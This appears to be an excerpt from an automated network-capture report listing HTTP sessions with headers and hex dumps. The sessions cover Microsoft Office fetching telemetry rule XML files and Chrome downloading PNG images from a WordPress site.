                                                                                                                      x-azure-ref: 20241203T075525Z-174f7845968swgbqhC1EWRmnb400000015qg000000009wag
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:25 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      121192.168.2.44988413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:25 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 474
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                      x-ms-request-id: 20bd7b2d-701e-001e-11a1-42f5e6000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075525Z-174f7845968n2hr8hC1EWR9cag000000158g000000005zqq
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:25 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      122192.168.2.449888196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:25 UTC621OUTGET /wp-content/uploads/2018/02/products3.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:26 UTC263INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:12 GMT
                                                                                                                      ETag: "1ad41-56723b59c7800"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 109889
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:26 UTC7929INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 42 00 00 00 e3 08 02 00 00 00 7f f8 8a 34 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 ac e3 49 44 41 54 78 da 7c bd 49 ac 65 49 7a 1e 16 c3 99 ee f4 86 9c 2a 87 aa ea ea e6 d0 cd 6e 92 12 07 51 6c 4a 94 28 0b a2 41 10 10 2d 68 63 c3 a6 37 86 17 5e 78 67 c0 96 cd b5 36 06 04 7b 67 c0 80 0c c3 90 2d 18 5c d8 96 44 81 83 65 91 22 65 93 6d 0e ad 66 77 b3 bb 6b c8 1a b2 b2 72 78 d3 1d ce 1c 11 fe 87 88 38 71 6e 26 fd b2 2a 87 f7 ee 3d f7 9c 88 f8 e7 ef ff 7e f9 cd 8f 3f 51 d2 69 29 95 94 ce 39 61 f1 cb 38 67 ad 1b 9d 75 42 48 a9 95 52 42 0a 27 f1 4b c0 17 fd a6 1c fe 2e 1c 7e 85 3f e9 cb c2 bf f1 ed e1 7b f0 6f bc 7e 7c 05 bc 9f fe
                                                                                                                      Data Ascii: PNGIHDRB4tEXtSoftwareAdobe ImageReadyqe<IDATx|IeIz*nQlJ(A-hc7^xg6{g-\De"emfwkrx8qn&*=~?Qi)9a8guBHRB'K.~?{o~|
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 57 1b 0f 1b 85 50 09 1c 51 c4 86 50 f9 57 4e cd 25 5e ca 9c cf 8d 2b 24 dc 00 b5 0d 7e f5 32 cf eb ae 47 7c b5 93 1e bc 46 cb 65 d9 79 08 1d 22 1e 6f 2f b0 23 2a 63 4b 4f 7b ed fc d1 08 3d a8 ca e7 7e 89 4b 24 e2 60 5c dc 1c c5 88 99 d0 30 f1 9a aa bf 4c a1 3c 41 92 03 6a 9f f3 0b e9 d1 72 a9 12 e4 73 10 d3 30 ee 48 86 13 c8 41 b0 16 ec aa 68 d2 b6 a4 28 09 57 23 5c 84 70 05 3a 0b 6e a8 92 a5 ce ef 3c ba 0b e7 65 6b 9f 29 db 15 6e c8 6c 93 57 f9 66 b5 2e 2b 0c 77 d1 5b 46 71 c3 fa 25 d8 62 27 5b 81 21 31 75 bb 0e e4 db c1 e1 eb f0 35 64 8d c7 ac c8 b1 7e 91 95 4d 5b db ba 6d 6f 0e b6 ef 07 84 70 1a 52 ca 58 74 1f bb 6e 20 f0 56 86 e9 06 03 4b 30 da 41 72 2d 6a 1c b1 af 15 fb 7f 34 b7 7c 90 0a 75 62 ec ff f8 b7 7f fb 17 7e f9 97 ad 38 c6 4f 26 6e af 14 29
                                                                                                                      Data Ascii: WPQPWN%^+$~2G|Fey"o/#*cKO{=~K$`\0L<Ajrs0HAh(W#\p:n<ek)nlWf.+w[Fq%b'[!1u5d~M[mopRXtn VK0Ar-j4|ub~8O&n)
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 57 cf 9e 23 5a a0 aa ce ee de 85 1b 7f 70 ff de b3 67 2f 36 ab e5 cb a7 9f 82 d9 b9 79 f9 f4 b3 0f be 5b 3d fa 42 1c 02 67 9c 1e 68 26 05 4f 60 52 36 38 bc 24 6f 9c db 30 94 2d 14 7e 0c 67 3a 44 8f 9a ba 10 3d 84 7e 35 0e 8c 12 09 95 57 f0 a9 54 9c 15 36 ef 65 b1 49 37 4c a8 14 78 8f 9a 5a b3 e6 f4 4e 61 48 0c ef 88 09 88 e0 98 c1 49 06 2c bb 79 9c 16 c7 aa 39 6e a9 53 c1 ec 73 eb a2 f1 43 8f 50 f9 22 97 59 56 ca 7c 40 8a 06 24 08 c7 5f 3e 5b 47 78 29 38 49 11 bc c8 24 6d b0 a3 0e 9d 30 49 6f 40 75 0c d7 e9 03 08 cb 11 85 80 65 db 4b 04 48 3c 5a c8 26 81 22 3b a7 01 bd 84 11 b8 25 b9 e5 56 4a 0a be 11 9d 79 ba 29 bf 78 f7 36 f8 6e cf 9e 7e 76 79 f1 a2 39 d8 9a a9 9d 9c 7d f6 e4 f9 db 5f fe c2 d0 d4 4c 88 32 c5 98 29 da 8a 59 56 b9 cd c2 45 29 e7 22 9c b7
                                                                                                                      Data Ascii: W#Zpg/6y[=Bgh&O`R68$o0-~g:D=~5WT6eI7LxZNaHI,y9nSsCP"YV|@$_>[Gx)8I$m0Io@ueKH<Z&";%VJy)x6n~vy9}_L2)YVE)"
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 3e 18 f6 87 28 d2 48 42 ee 15 72 e5 15 e4 e0 10 da 0a d7 41 a4 98 76 72 25 ff 57 92 bc c1 0e 19 ce 3c aa 46 12 82 09 0a 44 27 9f e3 3d ee f4 96 b2 c3 7c 95 2c f1 cc 6c 7c 51 13 55 ad 4d 31 f5 3d 0c a7 d4 48 ed e8 69 1d ed 8c da 26 bc 93 5b 34 3b 8d 15 b0 28 5f 21 69 19 51 65 ed be bb 64 42 11 5d 80 cc a0 d2 24 1d f4 7a 70 80 83 30 68 8a 1c 61 3d 10 c0 98 73 2b 28 9e 71 ec 94 c5 50 a4 48 cf b3 48 94 14 92 60 8d 88 76 64 89 93 f8 57 c5 51 48 bc 94 c4 47 6f 70 92 52 4b 5c 23 b7 9c 51 c5 45 2b ae 81 93 ef 92 d4 5f a8 f8 d1 4e 70 c2 0b 78 59 b3 3c 29 cf 8e ad 9d 2b cc 66 70 4d e6 71 0c b7 0b 14 84 78 2c d3 64 3c 1c 35 01 d4 f6 8a 3a 37 84 06 c3 e3 af d1 93 97 04 e8 e9 3b 5a 2b b4 41 83 5f a7 0d 9b 16 ae d6 33 6d 4c 32 ac 55 09 d6 8b 7c a3 ae 6f 8a 6e c9 97 1a
                                                                                                                      Data Ascii: >(HBrAvr%W<FD'=|,l|QUM1=Hi&[4;(_!iQedB]$zp0ha=s+(qPHH`vdWQHGopRK\#QE+_NpxY<)+fpMqx,d<5:7;Z+A_3mL2U|on
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 24 9e c2 91 52 56 a3 45 0f 92 3d f5 ea 99 17 c8 cf 6d a8 dc 32 26 c6 b4 97 e4 b2 f3 64 d0 fa fb 2d ac d8 28 90 9a 3e 54 8b 49 91 b8 4b 8b 3f 32 31 bc 1c e6 e3 eb 26 4f 0b e4 87 1b c3 43 2e 6e be eb 3d 2a 8b 2c cf 29 b3 1c ba 28 38 1f 7a 08 05 f5 b4 87 31 6c 69 c1 f6 86 69 39 09 cb c2 4d a4 de 29 92 dc 15 e9 54 a0 00 bf 56 d8 a5 45 b2 ce 67 82 e8 c5 9a a5 4b af aa 29 b2 02 5e 41 51 14 90 5e 02 3f cc 8b 14 7e 41 6f 9c c3 ff 8b a0 fa 8c 8b 34 c7 7e 8a a8 84 ba a8 ce 58 8e 34 46 cf 0b d2 e4 ec e4 24 08 c3 8d 8d cd 22 4f b8 53 e7 47 0f 02 78 3e 93 eb da 34 4e ad 29 67 99 8f d2 7e 6a 40 6d 1c c6 3a 73 53 d5 f1 d0 cd 34 ab c3 0b f1 86 a9 55 b8 27 c7 bb 17 13 37 f1 ad cc 7c 13 3d f3 70 d2 8b ba d1 d9 ce 2e 4b eb f2 e1 7d ff fa 6d db 1f 32 ac 57 71 10 6d f7 47 b3
                                                                                                                      Data Ascii: $RVE=m2&d-(>TIK?21&OC.n=*,)(8z1lii9M)TVEgK)^AQ^?~Ao4~X4F$"OSGx>4N)g~j@m:sS4U'7|=p.K}m2WqmG
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 98 86 a7 76 4e 4c 3e 85 c7 5c 1f 6b 6b 80 2e 23 41 93 96 4d b1 32 fb 82 63 71 74 7f 1f 5a ae d1 e6 25 db 73 aa 28 91 65 ca 64 41 ae 66 8c 50 56 92 63 dd e5 78 61 0f 17 a7 79 56 34 95 ad 9a fe c6 18 2a 9c 68 3a cd 95 9d ba 50 b9 d8 28 28 45 6b e3 cb 97 ae 7e ec c7 3e 2b 92 53 88 da c8 0d ee c7 07 af fd af ff fb fb 6e 5e 61 8b a9 8c 93 fd c7 27 79 ad dd af 0c fd 10 a7 b6 6d 24 ca 46 75 f5 82 ed 5a 51 a1 7e e5 37 fe e1 37 be f1 87 ff e3 7f ff 8f 94 2a c7 81 03 55 0a 14 a2 68 fc a9 8c 9b 3b ef 58 22 2b 3b 37 c2 12 b3 4f fc cc 2f 7d f0 63 1f b7 c8 d2 a5 2e 8a ef be fa 0a ca 31 5a 16 54 b4 a8 3b 82 c5 aa 98 9f 9d 06 bd 1e 9c d5 d0 77 27 e3 91 63 bb 48 8a 27 90 1d 04 b8 b0 84 f1 24 33 0b 73 f3 51 6a be 84 6e 8c 29 26 6b c7 f1 e7 f3 39 a9 4c 43 3d e7 43 95 9b a7
                                                                                                                      Data Ascii: vNL>\kk.#AM2cqtZ%s(edAfPVcxayV4*h:P((Ek~>+Sn^a'ym$FuZQ~77*Uh;X"+;7O/}c.1ZT;w'cH'$3sQjn)&k9LC=C
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 6c d7 b8 77 b8 ae d5 cd 64 d3 59 63 56 54 5b a1 66 fd 90 30 80 d3 60 b6 e4 ca ad 04 23 2a 48 6e ee 40 53 68 d1 6c 89 5d 4f 4f 00 ec f0 c5 a6 d7 a0 0e 31 42 60 0a 16 bd 70 e8 f9 75 b7 43 85 49 32 ad 16 10 0e 47 24 2b 11 46 d9 91 0b 64 2c ed 31 47 da d8 04 2b ef d2 e3 97 e8 96 02 91 09 a9 1c 65 db f0 fb 8c 2b 4a ff 82 cb 3b 97 e7 73 f8 18 d1 87 ce b2 94 3e 2e 9d 71 f8 27 01 08 1b 50 cd 82 a8 05 31 70 97 cb 73 ae 48 19 9f c4 a8 d0 42 28 ee df 7f f5 fb df fa e6 b7 9e 78 ec d1 9d cb 97 e8 80 8e ea fa ec d9 b3 4f 3e f1 04 6d dc 3f ff b3 ff f4 ad 97 bf f9 ec fb 9e fb e8 f3 1f b8 7d 1d 2e ad 74 f3 2a 56 ba 0a 00 9b 2d 55 0d 82 cd ec 74 36 9a 6c d2 e1 03 3c 9c ad 86 4b d6 0b ac d8 e8 c8 e7 3e ce 99 33 67 e8 8f f2 dc bc a2 9c 79 3a 9d 53 2a 3e 9b 2f 46 5e 18 83 56
                                                                                                                      Data Ascii: lwdYcVT[f0`#*Hn@Shl]OO1B`puCI2G$+Fd,1G+e+J;s>.q'P1psHB(xO>m?}.t*V-Ut6l<K>3gy:S*>/F^V
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 3a fa 8c 38 13 be 81 c6 40 08 e4 6a ad 4d 5a 67 14 12 94 1b 74 7a cf 7f e9 17 5e 1f 8f df f8 0f bf 33 a4 54 99 91 cf 10 52 4f 8a da 47 89 05 e6 b0 ef 16 4e 0a 8f 35 5d 61 03 b9 3e 63 88 29 9d 2e 2b ce 2b e3 5c 2f 6b 15 87 d1 e7 7f f9 bf a1 60 85 3e 29 f3 35 d6 ad 08 2b 69 56 31 ed c4 69 4c e8 94 18 09 71 c5 c3 c2 17 2e ef 45 07 a3 c4 4a b9 8d 6d b9 d2 2b 35 fe da d6 25 e6 a9 1a b5 6a be 20 0c b7 91 5f b4 6e 52 4c 94 e3 88 ff d2 fd 06 5f 2f 00 8c 09 83 46 77 dd 7b 8d c7 51 26 9a 7b dd 76 8f 0a 87 fb 07 fb 6b a6 4f a6 87 74 ee da 33 db 57 be f5 e0 fa 9b 1e fc 2b 0b 4a 7e b3 82 15 b0 50 bb fa 54 36 c2 7c 5c 9b 67 e1 f0 70 82 3d 2f 74 6d bd e1 2a d1 24 e1 66 06 9d 2f ba ab 28 55 38 be 7b 40 05 6d 34 e8 d0 56 a4 cd 4c 95 1b c5 06 28 67 30 b8 42 46 d6 ac 68 c7
                                                                                                                      Data Ascii: :8@jMZgtz^3TROGN5]a>c).++\/k`>)5+iV1iLq.EJm+5%j _nRL_/Fw{Q&{vkOt3W+J~PT6|\gp=/tm*$f/(U8{@m4VL(g0BFh
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: ce b5 c2 d0 3a ed 34 d0 50 91 30 92 69 9c 24 99 50 b4 a9 a9 40 f0 3d a6 d7 d1 be f7 6d 6f db 55 96 b5 df 9c 58 b9 8d a5 28 b5 f7 57 d3 2b d4 4a e8 a9 2e a7 b9 e6 97 38 9f 3b 42 76 b5 12 49 66 1b 7b 0f 77 29 e5 9f 5a 7e 6b d8 ed 9c 2e 96 d6 e8 bc ae 57 f2 a4 cd 68 4b 3d f5 e1 0f dd fe e1 1b df f9 b3 3f ad 67 b0 5d c3 f8 09 93 b4 52 f4 32 9a 16 27 c5 3e fa 69 16 6b 74 c4 c9 89 95 1f bd ce c6 d6 67 7f ed cb 48 43 c0 22 d2 77 6e be 7d bc bf db 81 e9 93 67 2a 61 ba bf da e1 93 4f 3d b1 bf 7f b8 bf 7f 50 30 42 6a 0d cc 8f 2b 12 17 31 eb 5b d2 eb 53 c0 49 71 a4 59 97 37 67 26 2f 03 ac e8 12 60 05 80 52 f4 0a 78 15 6a e1 b1 35 d3 7e aa a3 9b 99 e8 5f ff f4 a7 46 b0 c6 2a 5c 53 cc 68 76 57 e1 4e 2f 17 c0 9c 3b 78 3c ea ab 64 52 50 15 da b0 af c0 60 2f 94 91 f2 30
                                                                                                                      Data Ascii: :4P0i$P@=moUX(W+J.8;BvIf{w)Z~k.WhK=?g]R2'>iktgHC"wn}g*aO=P0Bj+1[SIqY7g&/`Rxj5~_F*\ShvWN/;x<dRP`/0
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: 92 d5 fb 1b ef 7d fb 7b bf fa db bf 85 9d aa 38 2e c8 c8 96 1b 6c b5 c0 bb 3c 7e f9 f3 bf fc d3 c5 78 88 b4 38 32 af 41 41 b9 38 85 83 3f 45 32 b0 c9 73 91 43 c0 fa 9e 6a 03 63 31 2a 88 18 f7 bc 66 b3 15 46 61 b2 48 0e 5e ef 7f f6 e9 67 be 17 bc f3 ee fd 7b f7 de e9 a3 76 ac 19 8d 86 09 f1 8a a1 82 ee 62 41 5b 6e ac 75 77 ae 6c ce 67 53 b8 e6 78 3e 31 45 46 d2 17 f2 82 dd ee da da 46 ff e2 e2 22 0a 43 48 cb 67 b3 b9 62 e3 19 6a eb 43 8e 50 af d5 60 2f 43 c6 70 7c 78 b0 b9 b9 95 92 41 04 d3 8b 45 ae c1 20 89 aa cc 59 da 56 4a 1c 3c 8d 68 27 53 f1 8e 25 73 61 47 52 86 95 5a 69 2b 17 86 83 ae cc fc d9 5e c3 70 53 13 2d 9b 1d cf 0b e3 ac 78 fe fa 10 e1 9c 95 6f 09 1a 93 f9 dc 56 21 c1 1f ad 98 18 46 dc 3d c6 53 51 22 80 7a 0c 70 7a b5 5b 8d 5e a7 de ae bb ee
                                                                                                                      Data Ascii: }{8.l<~x82AA8?E2sCjc1*fFaH^g{vbA[nuwlgSx>1EFF"CHgbjCP`/Cp|xAE YVJ<h'S%saGRZi+^pS-xoV!F=SQ"zpz[^


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      123192.168.2.449886196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:25 UTC385OUTGET /wp-content/uploads/2018/02/mission-blue.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC259INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:10 GMT
                                                                                                                      ETag: "612-56723b57df380"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 1554
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:25 UTC1554INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 86 00 00 00 79 08 06 00 00 00 fc bd 59 5d 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 05 b4 49 44 41 54 78 da ec 9d db 6d e2 40 14 86 c7 a3 7d 5f 24 1a 60 2b 58 52 c1 9a 02 90 48 07 50 c1 42 05 40 05 b0 15 40 07 20 a5 00 e8 20 d9 0a 96 06 22 51 c2 7a e2 41 c6 09 9e 33 b6 c7 9e 8b ff 4f 0a 2f b9 f9 f2 f9 9c 39 67 c6 36 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 25 f2 6e 8b 5f de 07 c9 e7 d4 b1 ad da b3 71 ff 02 31 ec 49 31 4c 3e 4f c9 57 cf b1 2d bb 26 5f a3 44 8e b7 50 c4 e0 9e 6d ef d2 41 29 98 dc a6 4d 48 11 c3 37 31 26 0e 6f 5b 0c 31 40 f0 40 0c 00 31 80 3e df 02 d9 8f 73 52 11 8c 5a aa 8c 56 72 10 8c 88 01 90 4a 00
                                                                                                                      Data Ascii: PNGIHDRyY]tEXtSoftwareAdobe ImageReadyqe<IDATxm@}_$`+XRHPB@@ "QzA3O/9g6c%n_q1I1L>OW-&_DPmA)MH71&o[1@@1>sRZVrJ


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      124192.168.2.449885196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:25 UTC621OUTGET /wp-content/uploads/2018/02/products2.png HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC262INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sun, 11 Mar 2018 14:19:11 GMT
                                                                                                                      ETag: "16f13-56723b58d35c0"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 93971
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:25 UTC7930INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 42 00 00 00 e3 08 02 00 00 00 7f f8 8a 34 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 6e b5 49 44 41 54 78 da 8c bd 49 8f 6c 49 76 26 66 c7 cc ee 75 f7 18 de 94 2f f3 65 65 56 b1 aa 58 2a 56 15 87 a2 8a c5 16 a8 42 b7 04 f6 04 a8 01 01 04 ba d1 80 d0 1b ed b4 d1 4e 3f 42 5b 6d 5a 02 04 48 1b 41 d2 46 10 04 41 ab 5e 10 10 9b 00 55 84 d4 24 9b 4d 89 c5 a1 58 53 ce 99 6f 88 17 11 ee 7e ef 35 3b b2 33 99 d9 f5 88 24 3b 99 cc 8a f7 22 c2 fd fa bd 76 a6 ef 7c e7 3b e0 be fa 0d 27 ff 00 d8 17 fc 5f 74 ed 1f e0 ef 46 d8 7a 1f 7c d8 7a 18 02 0c 1e 82 83 e0 1d 82 f3 0e 12 96 7f 5c f9 37 e5 3c a5 b4 4f f8 3a 65 37 27 b7 94 7f 17 87 d9 5e
                                                                                                                      Data Ascii: PNGIHDRB4tEXtSoftwareAdobe ImageReadyqe<nIDATxIlIv&fu/eeVX*VBN?B[mZHAFA^U$MXSo~5;3$;"v|;'_tFz|z\7<O:e7'^
                                                                                                                      2024-12-03 07:55:26 UTC8000INData Raw: dc 83 1c 1e a5 77 d2 71 d0 c0 c0 3a 24 35 21 30 9e 3b cf 52 e5 8e 40 2a f8 79 c5 98 c9 98 bd 4c 08 86 1a 29 54 99 2e f1 d8 5f 62 1e b7 36 f5 72 50 01 29 8e 7e 50 c1 4a d3 a5 a8 70 0b d6 2a a6 93 10 84 fb fd a9 74 69 98 c3 41 53 be 25 23 22 d4 7d c3 ad e3 18 a3 63 ca 62 e0 5e 2e a9 f6 00 91 31 c6 10 a3 35 66 d8 96 33 e7 8a 78 bb d0 bc c7 86 27 5a 32 0f 9c 86 ca 68 ee 94 61 0c 51 d6 01 63 9d e6 30 8e 53 6a 33 79 42 42 d3 a9 54 6f 65 14 7d 4c 1e ed 62 df a2 f9 b4 60 68 e5 46 12 fe cc 1d 33 23 99 d3 f3 65 4e 41 29 83 ab d8 81 e8 b3 35 be 50 1d 43 30 56 93 86 8b ac 1e 11 8d 0d 5d dd a8 96 3e ea 59 02 53 db ab be 4c 2e f1 77 61 04 2b 4f ec e0 96 4a bf 62 4a 4f 66 21 83 06 63 51 91 60 6a 3e 32 e8 90 9d b0 c6 8c 21 43 a2 47 55 80 84 d9 75 e4 81 16 ae a9 05 99 63
                                                                                                                      Data Ascii: wq:$5!0;R@*yL)T._b6rP)~PJp*tiAS%#"}cb^.15f3x'Z2haQc0Sj3yBBToe}Lb`hF3#eNA)5PC0V]>YSL.wa+OJbJOf!cQ`j>2!CGUuc
